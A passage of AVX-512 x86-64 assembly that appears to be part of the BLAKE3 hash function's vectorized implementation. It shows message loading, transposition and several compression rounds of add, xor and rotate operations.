vmovdqu32 ymm25, ymmword ptr [r9+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r13+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm8, zmm24, zmm25
vpunpckhqdq zmm9, zmm24, zmm25
vmovdqu32 ymm24, ymmword ptr [r10+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r14+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r11+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r15+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm10, zmm24, zmm25
vpunpckhqdq zmm11, zmm24, zmm25
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r12+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r13+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r14+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
prefetcht0 [r15+rdx+0x80]
mov r8, qword ptr [rdi+0x20]
mov r9, qword ptr [rdi+0x28]
mov r10, qword ptr [rdi+0x30]
mov r11, qword ptr [rdi+0x38]
mov r12, qword ptr [rdi+0x60]
mov r13, qword ptr [rdi+0x68]
mov r14, qword ptr [rdi+0x70]
mov r15, qword ptr [rdi+0x78]
vmovdqu32 ymm24, ymmword ptr [r8+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r12+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r9+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r13+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm12, zmm24, zmm25
vpunpckhqdq zmm13, zmm24, zmm25
vmovdqu32 ymm24, ymmword ptr [r10+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r14+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r11+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r15+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm14, zmm24, zmm25
vpunpckhqdq zmm15, zmm24, zmm25
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r12+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r13+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r14+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
prefetcht0 [r15+rdx+0x80]
vshufps zmm24, zmm8, zmm10, 136
vshufps zmm30, zmm12, zmm14, 136
vmovdqa32 zmm28, zmm24
vpermt2d zmm24, zmm27, zmm30
vpermt2d zmm28, zmm31, zmm30
vshufps zmm25, zmm8, zmm10, 221
vshufps zmm30, zmm12, zmm14, 221
vmovdqa32 zmm29, zmm25
vpermt2d zmm25, zmm27, zmm30
vpermt2d zmm29, zmm31, zmm30
vshufps zmm26, zmm9, zmm11, 136
vshufps zmm8, zmm13, zmm15, 136
vmovdqa32 zmm30, zmm26
vpermt2d zmm26, zmm27, zmm8
vpermt2d zmm30, zmm31, zmm8
vshufps zmm8, zmm9, zmm11, 221
vshufps zmm10, zmm13, zmm15, 221
vpermi2d zmm27, zmm8, zmm10
vpermi2d zmm31, zmm8, zmm10
vpbroadcastd zmm8, dword ptr [BLAKE3_IV_0+rip]
vpbroadcastd zmm9, dword ptr [BLAKE3_IV_1+rip]
vpbroadcastd zmm10, dword ptr [BLAKE3_IV_2+rip]
vpbroadcastd zmm11, dword ptr [BLAKE3_IV_3+rip]
vmovdqa32 zmm12, zmmword ptr [rsp]
vmovdqa32 zmm13, zmmword ptr [rsp+0x1*0x40]
vpbroadcastd zmm14, dword ptr [BLAKE3_BLOCK_LEN+rip]
vpbroadcastd zmm15, dword ptr [rsp+0x22*0x4]
vpaddd zmm0, zmm0, zmm16
vpaddd zmm1, zmm1, zmm18
vpaddd zmm2, zmm2, zmm20
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm17
vpaddd zmm1, zmm1, zmm19
vpaddd zmm2, zmm2, zmm21
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm24
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm28
vpaddd zmm3, zmm3, zmm30
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm25
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm29
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm18
vpaddd zmm1, zmm1, zmm19
vpaddd zmm2, zmm2, zmm23
vpaddd zmm3, zmm3, zmm20
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm22
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm16
vpaddd zmm3, zmm3, zmm29
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm17
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm25
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm27
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm30
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm19
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm29
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm20
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm18
vpaddd zmm3, zmm3, zmm30
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm22
vpaddd zmm1, zmm1, zmm25
vpaddd zmm2, zmm2, zmm27
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm21
vpaddd zmm1, zmm1, zmm16
vpaddd zmm2, zmm2, zmm31
vpaddd zmm3, zmm3, zmm17
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm26
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm30
vpaddd zmm3, zmm3, zmm29
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm23
vpaddd zmm1, zmm1, zmm25
vpaddd zmm2, zmm2, zmm19
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm20
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm21
vpaddd zmm3, zmm3, zmm17
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm16
vpaddd zmm1, zmm1, zmm18
vpaddd zmm2, zmm2, zmm24
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm28
vpaddd zmm1, zmm1, zmm25
vpaddd zmm2, zmm2, zmm31
vpaddd zmm3, zmm3, zmm30
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm29
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm26
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm23
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm16
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm18
vpaddd zmm1, zmm1, zmm19
vpaddd zmm2, zmm2, zmm17
vpaddd zmm3, zmm3, zmm20
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm25
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm24
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm30
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm28
vpaddd zmm3, zmm3, zmm17
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm29
vpaddd zmm1, zmm1, zmm16
vpaddd zmm2, zmm2, zmm18
vpaddd zmm3, zmm3, zmm20
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm19
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm22
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm27
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm17
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm31
vpaddd zmm1, zmm1, zmm16
vpaddd zmm2, zmm2, zmm25
